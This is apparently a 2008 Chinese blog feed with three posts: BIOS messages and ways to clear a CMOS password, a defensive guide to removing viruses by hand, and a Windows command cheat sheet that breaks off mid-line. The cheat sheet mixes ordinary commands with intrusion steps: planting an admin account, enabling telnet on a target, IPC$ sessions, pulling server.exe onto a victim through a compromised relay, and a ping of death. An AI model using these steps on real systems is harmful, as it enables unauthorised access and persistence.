<p><font size="3">解释：有的OEM厂商会以自己设计的显示画面来取代BIOS预设的开机显示画面，我们可以按TAB键来在BIOS预设的开机画面与厂商的自定义画面之间进行切换。 </font></p>
<p><br /><font size="3">12.Resuming from disk，Press TAB to show POST screen </font></p>
<p><font size="3">中文：从硬盘恢复开机，按TAB显示开机自检画面）。 </font></p>
<p><font size="3">解释：这是因为有的主板的BIOS提供了Suspend to disk(将硬盘挂起)的功能，如果我们用Suspend to disk的方式来关机，那么我们在下次开机时就会显示此提示消息。 </font></p>
<p><br /><font size="3">13.Hareware Monitor found an error，enter POWER MANAGEMENT SETUP for details，Press F1 to continue，DEL to enter SETUP </font></p>
<p><font size="3">中文：监视功能发现错误，进入POWER MANAGEMENT SETUP察看详细资料，按F1键继续开机程序，按DEL键进入COMS设置。 </font></p>
<p><font size="3">解释：有的主板具备硬件的监视功能，可以设定主板与CPU的温度监视、电压调整器的电压输出准位监视和对各个风扇转速的监视，当上述监视功能在开机时发觉有异常情况，那么便会出现上述这段话，这时可以进入COMS设置选择POWER MANAGEMENT SETUP，在右面的**Fan Monitor**、**Thermal Monitor**和**Voltage Monitor**察看是哪部分发出了异常，然后再加以解决。</font></p>
<p><font size="3"></font>&nbsp;</p>
<p><font size="3"></font>&nbsp;</p>
<p><font size="3">BIOS可以被映射</font></p>
<p><font size="3">因为BIOS使用的ROM比我们使用的普通内存RAM要慢很多，所以人们就想出在启动后把BIOS的ROM里面的信息拷贝到我们插的内存条（RAM）里来，提高读取速度，而在RAM里的这些BIOS的信息就叫做BIOS影子内存。</font></p>
<p><font size="3"></font>&nbsp;</p>
<p><font size="3"></font>&nbsp;</p>
<p><font size="3">BIOS与CMOS区别 <br />&nbsp;<br />　　　在日常操作和维护计算机的过程中，常常可以听到有关BIOS设置和CMOS设置的一些说法，许多人对BIOS和CMOS经常混为一谈。本文主要阐述对BIOS设置和CMOS设置在基本概念上的区分与联系。 　　</font></p>
<p><font size="3">　　BIOS是什么?</font></p>
<p><font size="3">　　所谓BIOS，实际上就是微机的基本输入输出系统（Basic Input－Output System），其内容集成在微机主板上的一个ROM芯片上，主要保存着有关微机系统最重要的基本输入输出程序，系统信息设置、开机上电自检程序和系统启动自举程序等。 </font></p>
<p><font size="3">BIOS的功用 </font></p>
<p><font size="3">　　BIOS ROM芯片不但可以在主板上看到，而且BIOS管理功能如何在很大程度上决定了主板性能是否优越。BIOS管理功能主要包括： 　　</font></p>
<p><font size="3">　　1． BIOS中断服务程序 </font></p>
<p><font size="3">　　BIOS中断服务程序实质上是微机系统中软件与硬件之间的一个可编程接口，主要用来在程序软件与微机硬件之间实现衔接。例如，DOS和Windows操作系统中对软盘、硬盘、光驱、键盘、显示器等外围设备的管理，都是直接建立在BIOS系统中断服务程序的基础上，而且操作人员也可以通过访问INT 5、INT 13等中断点而直接调用BIOS中断服务程序。 　　</font></p>
<p><font size="3">　　2．BIOS系统设置程序 </font></p>
<p><font size="3">　　微机部件配置记录是放在一块可读写的 CMOS RAM 芯片中的，主要保存着系统基本情况、CPU特性、软硬盘驱动器、显示器、键盘等部件的信息。在 BIOS ROM芯片中装有&quot;系统设置程序&quot;，主要用来设置CMOS RAM中的各项参数。这个程序在开机时按下某个特定键即可进入设置状态，并提供了良好的界面供操作人员使用。事实上，这个设置CMOS参数的过程，习惯上也称为&quot; BIOS设置&quot;。一旦CMOS RAM芯片中关于微机的配置信息不正确时，轻者会使得系统整体运行性能降低、软硬盘驱动器等部件不能识别，严重时就会由此引发一系统的软硬件故障。 </font></p>
<p><font size="3">　　3． POST上电自检</font></p>
<p><font size="3">　　微机按通电源后，系统首先由POST（Power On Self Test,上电自检)程序来对内部各个设备进行检查。通常完整的POST自检将包括对 CPU、640K基本内存、 1M以上的扩展内存、ROM、主板、CMOS存贮器、串并口、显示卡、软硬盘子系统及键盘进行测试，一旦在自检中发现问题，系统将给出提示信息或鸣笛警告。 　　</font></p>
<p><font size="3">　　4． BIOS系统启动自举程序 </font></p>
<p><font size="3">　　系统在完成 POST自检后， ROM BIOS 就首先按照系统 CMOS设置中保存的启动顺序搜寻软硬盘驱动器及CD-ROM、网络服务器等有效地启动驱动器，读入操作系统引导记录，然后将系统控制权交给引导记录，并由引导记录来完成系统的顺利启动。 </font></p>
<p><font size="3">　　CMOS是什么? </font></p>
<p><font size="3">　　CMOS(本意是指互补金属氧化物半导体存储嚣，是一种大规模应用于集成电路芯片制造的原料)是微机主板上的一块可读写的RAM芯片，主要用来保存当前系统的硬件配置和操作人员对某些参数的设定。CMOS RAM芯片由系统通过一块后备电池供电，因此无论是在关机状态中，还是遇到系统掉电情况，CMOS信息都不会丢失。 </font></p>
<p><font size="3">　　由于CMOS RAM芯片本身只是一块存储器，只具有保存数据的功能，所以对CMOS中各项参数的设定要通过专门的程序。早期的CMOS设置程序驻留在软盘上的(如IBM的PC/AT机型)，使用很不方便。现在多数厂家将CMOS设置程序做到了 BIOS芯片中，在开机时通过按下某个特定键就可进入CMOS设置程序而非常方便地对系统进行设置，因此这种CMOS设置又通常被叫做BIOS设置。 </font></p>
<p><font size="3">BIOS设置和CMOS设置的区别与联系 </font></p>
<p><font size="3">　　BIOS是主板上的一块EPROM或EEPROM芯片，里面装有系统的重要信息和设置系统参数的设置程序（BIOS Setup程序)；CMOS是主板上的一块可读写的RAM 芯片，里面装的是关于系统配置的具体参数，其内容可通过设置程序进行读写。CMOS RAM 芯片靠后备电池供电，即使系统掉电后信息也不会丢失。BIOS与CMOS既相关又不同：BIOS中的系统设置程序是完成CMOS参数设置的手段；CMOS RAM既是BIOS设定系统参数的存放场所，又是 BIOS设定系统参数的结果。因此，完整的说法应该是&quot;通过BIOS设置程序对CMOS参数进行设置&quot;。由于 BIOS和CMOS都跟系统设置密初相关，所以在实际使用过程中造成了BIOS设置和CMOS设置的说法，其实指的都是同一回事，但BIOS与CMOS却是两个完全不同的概念，千万不可搞混淆。 </font></p>
<p><font size="3">　　何时要对BIOS或CMOS进行设置？ </font></p>
<p><font size="3">　　众所周知，进行BIOS或CMOS设置是由操作人员根据微机实际情况而人工完成的一项十分重要的系统初始化工作。在以下情况下，必须进行BIOS或CMOS进行设置： </font></p>
<p><font size="3">　　1、新购微机</font></p>
<p><font size="3">　　即使带PnP功能的系统也只能识别一部分微机外围设备，而对软硬盘参数、当前日期、时钟等基本资料等必须由操作人员进行设置，因此新购买的微机必须通过进行CMOS参数设置来告诉系统整个微机的基本配置情况。 </font></p>
<p><font size="3">　　2．新增设备 </font></p>
<p><font size="3">　　由于系统不一定能认识新增的设备，所以必须通过CMOS设置来告诉它。另外，一旦新增设备与原有设备之间发生了IRQ、DMA冲突，也往往需要通过BIOS设置来进行排除。 </font></p>
<p><font size="3">　　3．CMOS数据意外丢失</font></p>
<p><font size="3">　　在系统后备电池失效、病毒破坏了 CMOS数据程序、意外清除了CMOS参数等情况下，常常会造成CMOS数据意外丢失。此时只能重新进入BIOS设置程序完成新的CMOS参数设置。 </font></p>
<p><font size="3">　　4．系统优化 </font></p>
<p><font size="3">　　对于内存读写等待时间、硬盘数据传输模式、内／外 Cache的使用、节能保护、电源管理、开机启动顺序等参数， BIOS中预定的设置对系统而言并不一定就是最优的，此时往往需要经过多次试验才能找到系统优化的最佳组合。 <br /></font></p>
<p><font size="3"></font>&nbsp;</p>
<p><font size="3"></font>&nbsp;</p>
<p><font size="3"></font>&nbsp;</p>
<p><font size="3">打开机箱，找到主板上的电池，将其与主板的连接断开（就是取下电池喽），此时CMOS将因断电而失去内部储存的一切信息。再将电池接通，合上机箱开机，由于CMOS已是一片空白，它将不再要求你输入密码，此时进入BIOS设置程序，选择主菜单中的&quot;LOAD BIOS DEFAULT&quot;（装入BIOS缺省值）或&quot;LOAD SETUP DEFAULT&quot;（装入设置程序缺省值）即可，前者以最安全的方式启动计算机，后者能使你的计算机发挥出较高的性能。</font></p>
<p><font size="3">妙用DEBUG清除CMOS密码 </font></p>
<p><font size="3">如果你忘记了进入CMOS设置程序的密码，除了可以在主板上使用跳线短接清除的方法外，还可以使用软件清除的方法，下面就来介绍如何在DOS下清除CMOS密码的方法。</font></p>
<p><font size="3">在DOS中提供了一个编辑器，就是DEBUG，这是一个非常实用的工具，启动方法是，在DOS命令提示符状态下输入命令：DEBUG、此时即可进入DEBUG编辑界面。</font></p>
<p><font size="3">在命令符状态下输入命令后，重新启动电脑即可清除CMOS密码，下面给出五个清除CMOS密码的命令行。</font></p>
<p><font size="3">方法一 <br />-o 70 16<br />-o 71 16<br />-q <br />方法二 <br />-o 70 11<br />-o 71 ff<br />-q <br />方法三 <br />-o 70 10<br />-o 71 10<br />-q <br />方法四 <br />-o 70 23<br />-o 71 34<br />-q <br />方法五 <br />-o 70 10<br />-o 71 ff<br />-q </font></p>
<p><font size="3">方法六<br />-o 70 90<br />-o 71 91<br />-q </font></p>
<p><font size="3">&nbsp;</font></p>
<p><font size="3"></font>&nbsp;</p>]]></description>
		</item>
		    
		
		<item>
			<title>手动杀毒</title>
			<link>http://qune1.blog.sohu.com/97624467.html</link>
			<comments>http://qune1.blog.sohu.com/97624467.html#comment</comments>
			<dc:creator>忆思雨帘</dc:creator>
			<pubDate>Tue, 19 Aug 2008 14:48:56 +0800</pubDate>
			<guid>http://qune1.blog.sohu.com/97624467.html</guid>
			<description><![CDATA[<p><font size="3">利用系统自带命令杀毒&mdash;&mdash;手动杀毒</font></p>
<p><font size="3">上网最恐怖的事莫过于新病毒出来的时候，尽管电脑上我们都装有各种强大的杀毒软件，也配置了定时自动更新病毒库，但病毒总是要先于病毒库的更新的，所以中招的每次都不会是少数，这里列举一些通用的杀毒方法，自己亲自动手来用系统自带的工具绞杀病毒：</font></p>
<p><font size="3">一、自己动手前，切记有备无患&mdash;&mdash;用TaskList备份系统进程<br />新型病毒都学会了用进程来隐藏自己，所以我们最好在系统正常的时候，备份一下电脑的进程列表，当然最好在刚进入Windows时不要运行任何程序的情况下备份，样以后感觉电脑异常的时候可以通过比较进程列表，找出可能是病毒的进程。</font></p>
<p><font size="3">在命令提示符下输入：<br />TaskList /fo:csv&gt;g:zc.csv<br />上述命令的作用是将当前进程列表以csv格式输出到&ldquo;zc.csv&rdquo;文件中，g:为你要保存到的盘，可以用Excel打开该文件.</font></p>
<p><font size="3">二、自己动手时，必须火眼金睛&mdash;&mdash;用FC比较进程列表文件<br />如果感觉电脑异常，或者知道最近有流行病毒，那么就有必要检查一下。</font></p>
<p><font size="3">进入命令提示符下，输入下列命令：<br />TaskList /fo:csv&gt;g:yc.csv<br />生成一个当前进程的yc.csv文件列表，然后输入：<br />FC g:\zccsv g:\yc.csy<br />回车后就可以看到前后列表文件的不同了，通过比较发现，电脑多了一个名为&ldquo;Winion0n.exe&rdquo;(这里以这个进程为例)不是&ldquo;Winionon.exe&rdquo;的异常进程。</font></p>
<p><font size="3">三、进行判断时，切记证据确凿&mdash;&mdash;用Netstat查看开放端口<br />对这样的可疑进程，如何判断它是否是病毒呢？根据大部分病毒（特别是木马）会通过端口进行对外连接来传播病毒，可以查看一下端口占有情况。</font></p>
<p><font size="3">在命令提示符下输入：<br />Netstat -a-n-o<br />参数含义如下：<br />a:显示所有与该主机建立连接的端口信息<br />n:显示打开端口进程PID代码<br />o：以数字格式显示地址和端口信息<br />回车后就可以看到所有开放端口和外部连接进程，这里一个PID为1756（以此为例）的进程最为可疑，它的状态是&ldquo;ESTABLISHED&rdquo;，通过任务管理器可以知道这个进程就是&ldquo;Winion0n.exe&rdquo;，通过查看本机运行网络程序，可以判断这是一个非法连接！<br />连接参数含义如下：<br />LISTENINC：表示处于侦听状态，就是说该端口是开放的，等待连接，但还没有被连接，只有TCP协议的服务端口才能处于LISTENINC状态。</font></p>
<p><font size="3">ESTABLISHED的意思是建立连接。<br />表示两台机器正在通信。<br />TIME-WAIT意思是结束了这次连接。<br />说明端口曾经有过访问，但访问结束了，用于判断是否有外部电脑连接到本机。</font></p>
<p><font size="3">四、下手杀毒时，一定要心狠手辣&mdash;&mdash;用NTSD终止进程 <br />虽然知道 &ldquo;Winion0n.exe&rdquo;是个非法进程，但是很多病毒的进程无法通过任务管理器终止，怎么办？<br />在命令提示符下输入下列命令：<br />ntsd &ndash;c q-p 1756<br />回车后可以顺利结束病毒进程。</font></p>
<p><font size="3">提示：&ldquo;1756&rdquo;为进程PID值，如果不知道进程的ID，打开任务管理器，单击&ldquo;查看&rarr;选择列&rarr;勾上PID（进程标识符）即可。<br />NTSD可以强行终止除Sytem,SMSS.EXE,CSRSS.EXE外的所有进程。</font></p>
<p><font size="3">五、断定病毒后，定要斩草除根&mdash;&mdash;搜出病毒原文件<br />对于已经判断是病毒文件的&ldquo;Winion0n.exe&rdquo;文件，通过搜索&ldquo;本地所有分区&rdquo;、&ldquo;搜索系统文件夹和隐藏的文件和文件夹&rdquo;，找到该文件的藏身之所，将它删除。<br />不过这样删除的只是病毒主文件，通过查看它的属性，依据它的文件创建曰期、大小再次进行搜索，找出它的同伙并删除。<br />如果你不确定还有那些文件是它的亲戚，通过网络搜索查找病毒信息获得帮助。</font></p>
<p><font size="3">六、清除病毒后一定要打扫战场<br />手动修复注册表虽然把病毒文件删除了，但病毒都会在注册表留下垃圾键值，还需要把这些垃圾清除干净。</font></p>
<p><font size="3">1、用reg export备份自启动。<br />由于自启动键值很多，发现病毒时手动查找很不方便。<br />这里用reg export+批处理命令来备份。</font></p>
<p><font size="3">启动记事本输入下列命令：<br />reg export HKLM\software\Microsoft\Windows\<br />CurrentVersion\Run f:\hklmrun.reg<br />reg export HKCU\Software\Microsoft\Windows\<br />CurrentVersion\Policies\Explorer\Run f:\hklcu.reg<br />reg export HKLM\SOFTWARE\Microsoft\Windows\<br />CurrentVersion\Policies\Explorer\Run hklml.reg<br />注：这里只列举几个常见键值的备份，其它键值请参照上述方法制作。</font></p>
<p><font size="3">然后将它保存为ziqidong.bat在命令提示符下运行它，即可将所有自启动键值备份到相应的reg文件中，接着再输入：<br />copy f:\*.reg ziqidong.txt<br />命令的作用是将所有备份的reg文件输出到&ldquo;ziqidong.txt&rdquo;中，这样如果发现病毒新增自启动项，同上次导出自启动值，利用上面介绍的FC命令比较前后两个txt文件，即可快速找出新增自启动项目。</font></p>
<p><font size="3">2、用reg delete删除新增自启动键值。<br />比如：通过上面的方法在[HKER_CURRENT_USER\SOFTWARE\Microsoft\<br />Windows\CurrentVersion\Run],找到一个&ldquo;Logon&rdquo;自启动项，启动程序为&ldquo;c:\windows\winlogon.exe&rdquo;,现在输入下列命令即可删除病毒自启动键值：<br />reg delete HKLM\software\Microssoft\Windows\<br />CurrentVersion\Run /f<br />3、用reg import恢复注册表。<br />Reg delete删除是的是整个RUN键值，现在用备份好的reg文件恢复即可，输入下列命令即可迅速还原注册表：<br />reg import f:\hklmrun.reg<br />上面介绍手动杀毒的几个系统命令，其实只要用好这些命令，我们基本可以KILL掉大部分的病毒，当然平时就一定要做好备份工作。</font></p>
<p><font size="3">提示：上述操作也可以在注册表编辑器里手动操作，但是REG命令有个好处，那就是即使注册表编辑器被病毒设置为禁用，也可以通过上述命令导出/删除/导入操作，而且速度更快！</font></p>
<p><font size="3">七、捆绑木马克星&mdash;&mdash;FIND <br />上面介绍利用系统命令查杀一般病毒，下面再介绍一个检测捆绑木马的&ldquo;FIND&rdquo;命令。<br />相信很很多网虫都遭遇过捆绑木刀，这些&ldquo;批着羊皮的狼&rdquo;常常躲在图片、FLASH、甚至音乐文件后面。<br />当我们打开这些文件的时候，虽然在当前窗口显示的确实是一幅图片（或是播放的FLASH），但可恶的木马却已经在后台悄悄地运行了。<br />比如近曰我就收到一张好友从QQ传来的超女壁纸，但是当我打开图片时却发现：图片已经用&ldquo;图片和传真查看器&rdquo;打开了，硬盘的指示灯却一直在狂闪。<br />显然在我打开图片的同时，有不明的程序在后台运行。<br />现在用FIND命令检测图片是否捆绑木马，在命令提示符输入：<br />FIND /c /I〝This program〞g:\chaonv.jpe.exe其中:<br />g:\chaonv.jpe.exe表示需要检测的文件<br />FIND命令返回的提示是&ldquo;___G:CHAONV.EXE: 2&rdquo;,这表明&ldquo;G：、CHAONV.EXE&rdquo;确实捆绑了其它文件。<br />因为FIND命令的检测：如果是EXE文件，正常情况下返回值应该为&ldquo;1&rdquo;；如果是不可执行文件，正常情况下返回值应该为&ldquo;0&rdquo;，其它结果就要注意了。</font></p>
<p><font size="3">提示：其实很多捆绑木马是利用Windows默认的&ldquo;隐藏已知类型文件扩展名&rdquo;来迷惑我们，比如本例的&ldquo;chaonv.jpe.exe&rdquo;，由于这个文件采用了JPG文件的图标，才导致上当。<br />打开&ldquo;我的电脑&rdquo;，单击&ldquo;工具&rarr;文件夹选项&rdquo;，&ldquo;单击&rdquo;&ldquo;查看&rdquo;，去除&ldquo;隐藏已知类型文件扩展名&rdquo;前的小勾，即可看清&ldquo;狼&rdquo;的真面目。</font></p>
<p><font size="3">八、总结<br />最后我们再来总结一下手动毒的流程：<br />用TSKLIST备份好进程列表&rarr;通过FC比较文件找出病毒&rarr;用NETSTAT判断进程&rarr;用FIND终止进程&rarr;搜索找出病毒并删除&rarr;用REG命令修复注册表。<br />这样从发现病毒、删除病毒、修复注册表，这完成整个手动查毒、杀毒过程。<br /></font></p>]]></description>
		</item>
		    
		
		<item>
			<title>命令</title>
			<link>http://qune1.blog.sohu.com/97624362.html</link>
			<comments>http://qune1.blog.sohu.com/97624362.html#comment</comments>
			<dc:creator>忆思雨帘</dc:creator>
			<pubDate>Tue, 19 Aug 2008 14:47:45 +0800</pubDate>
			<guid>http://qune1.blog.sohu.com/97624362.html</guid>
			<description><![CDATA[<p><font size="3">net user heibai lovechina /add&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 加一个heibai的用户密码为lovechina <br />net localgroup Administrators heibai /add&nbsp;&nbsp;&nbsp;&nbsp; 把他加入Administrator组<br />net start telnet&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 开对方的TELNET服务<br />net use z:\127.0.0.1c$&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 映射对方的C盘<br />net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] &quot; &quot; /user:&quot; &quot; 建立IPC空链接 <br />net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] &quot;密码&quot; /user:&quot;用户名&quot; 建立IPC非空链接 <br />net use h: [url=file://\\ip\c$]\\ip\c$[/url] &quot;密码&quot; /user:&quot;用户名&quot; 直接登陆后映射对方C：到本地为H: <br />net use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H: <br />net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接 <br />net use h: /del 删除映射对方到本地的为H:的映射 <br />net user 用户名　密码　/add&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 建立用户 <br />net user&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 查看有哪些用户 <br />net user 帐户名&nbsp;&nbsp;&nbsp; 查看帐户的属性<br />net user guest /active:yes&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 将Guest用户激活<br />net user guest lovechina&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 把guest的密码改为lovechina<br />net user 用户名 /delete&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 删掉用户<br />net user guest/time:m-f,08:00-17:00 表示guest用户登录时间为周一至周 五的net user guest/time:m,4am-5pm;t,1pm-3pm;w-f,8:00-17:00 表示guest用户登录时间为周一4:00/17:00,周二13:00/15:00,周三至周五8:00/17:00.<br />net user guest/time:all表示没有时间限制.<br />net user guest/time 表示guest用户永远不能登录. 但是只能限制登陆时间，不是上网时间<br />net time [url=file://\\127.0.0.1]\\127.0.0.1[/url]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 得到对方的时间， <br />get c:\index.htm d:\&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 上传的文件是INDEX.HTM，它位于C:\下，传到对方D:\ <br />copy index.htm [url=file://\\127.0.0.1\c$\index.htm]\\127.0.0.1\c$\index.htm[/url]&nbsp;&nbsp;&nbsp;&nbsp; 本地C盘下的index.htm复制到127.0.0.1的C盘<br />net localgroup administrators 用户名 /add 把&ldquo;用户&rdquo;添加到管理员中使其具有管理员权限,注意：administrator后加s用复数 <br />net start 查看开启了哪些服务 <br />net start 服务名　 开启服务；(如:net start telnet， net start schedule) <br />net stop 服务名 停止某服务 <br />net time \\目标ip 查看对方时间 <br />net time \\目标ip /set 设置本地计算机时间与&ldquo;目标IP&rdquo;主机的时间同步,加参数/yes可取消确认信息 net view&nbsp;&nbsp;&nbsp; 查看本地局域网内开启了哪些共享 <br />net view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享 <br />net config 显示系统网络设置 <br />net logoff 断开连接的共享 <br />net pause 服务名 暂停某服务 <br />net send ip &quot;文本信息&quot; 向对方发信息 <br />net ver 局域网内正在使用的网络连接类型和信息 <br />net share 查看本地开启的共享 <br />net share ipc$ 开启ipc$共享 <br />net share ipc$ /del 删除ipc$共享 <br />net share c$ /del 删除C：共享 <br />net user guest 12345 用guest用户登陆后用将密码改为12345 <br />net password 密码 更改系统登陆密码 <br />netstat -a 查看开启了哪些端口,常用netstat -an <br />netstat -n 查看端口的网络连接情况，常用netstat -an <br />netstat -v 查看正在进行的工作 <br />netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况） <br />netstat -s 查看正在使用的所有协议使用情况 <br />nbtsta* -* ** 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 <br />tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：&ldquo;-w数字&rdquo;用于设置超时间隔。 <br />ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：&ldquo;-l[空格]数据包大小&rdquo;；&ldquo;-n发送数据次数&rdquo;；&ldquo;-t&rdquo;指一直ping。 <br />ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) <br />ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数&ldquo;/all&rdquo;显示全部配置信息 <br />tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) <br />kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) <br />del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如&ldquo;DEL/AR *.*&rdquo;表示删除当前目录下所有只读文件，&ldquo;DEL/A-S *.*&rdquo;表示删除当前目录下除系统文件以外的所有文件<br />del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同） <br />move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 <br />fc one.txt two.txt &gt; 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，&quot;&gt; &quot;和&quot;&gt; &gt;&quot; 是重定向命令 <br />at id号 开启已注册的某个计划任务 <br />at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止 <br />at id号 /delete 停止某个已注册的计划任务 <br />at 查看所有的计划任务 <br />at [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 <br />finger username @host 查看最近有哪些用户登陆 <br />telnet ip 端口 远和登陆服务器,默认端口为23 <br />open ip 连接到IP（属telnet登陆后的命令） <br />telnet 在本机上直接键入telnet 将进入本机的telnet <br />copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件 <br />copy c:\srv.exe $&quot;&gt;\\ip\admin$ 复制本地c:\srv.exe到对方的admin下 <br />cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件 <br />copy $\svv.exe&quot;&gt;\\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C： <br />xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件 <br />tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将&ldquo;IP&rdquo;的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送 <br />tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机 <br />ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时) <br />route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface <br />arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 <br />start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令 <br />mem 查看cpu使用情况 <br />attrib 文件名(目录名) 查看某文件（目录）的属性 <br />attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性 <br />dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间 <br />date /t 、 time /t 使用此参数即&ldquo;DATE/T&rdquo;、&ldquo;TIME/T&rdquo;将只显示当前日期和时间，而不必输入新日期和时间 <br />set 指定环境变量名称=要指派给变量的字符 设置环境变量 <br />set 显示当前所有的环境变量 <br />set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量 <br />pause 暂停批处理程序，并显示出：请按任意键继续.... <br />if 在批处理程序中执行条件处理（更多说明见if命令及变量） <br />goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：&ldquo;：start&rdquo;标签） <br />call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?） <br />for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量） <br />echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置 <br />echo 信息 在屏幕上显示出信息 <br />echo 信息 &gt;&gt; pass.txt 将&quot;信息&quot;保存到pass.txt文件中 <br />findstr &quot;Hello&quot; aa.txt 在aa.txt文件中寻找字符串hello <br />find 文件名 查找某文件 <br />title 标题名字 更改CMD窗口标题名字 <br />color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 <br />prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ ) <br />print 文件名 打印文本文件<br />ver 在DOS窗口下显示版本信息 <br />winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名） <br />format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS <br />md　目录名 创建目录 <br />replace 源文件　要替换文件的目录 替换文件 <br />ren 原文件名　新文件名 重命名文件名 <br />tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称 <br />type 文件名 显示文本文件的内容 <br />more 文件名 逐屏显示输出文件 <br />doskey 要锁定的命令＝字符 <br />doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir= <br />taskmgr 调出任务管理器 <br />chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误 <br />tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口 <br />exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe <br />path 路径\可执行文件的文件名 为可执行文件设置一个路径。 <br />cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /? <br />regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示； <br />regedit /e 注册表文件名 导出注册表 <br />cacls 文件名　参数 显示或修改文件访问控制列表（ACL）&mdash;&mdash;针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 <br />cacls 文件名 查看文件的访问用户权限列表 <br />REM 文本内容 在批处理文件中添加注解 <br />netsh 查看或更改本地网络配置情况<br />IIS服务命令： <br />iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现） <br 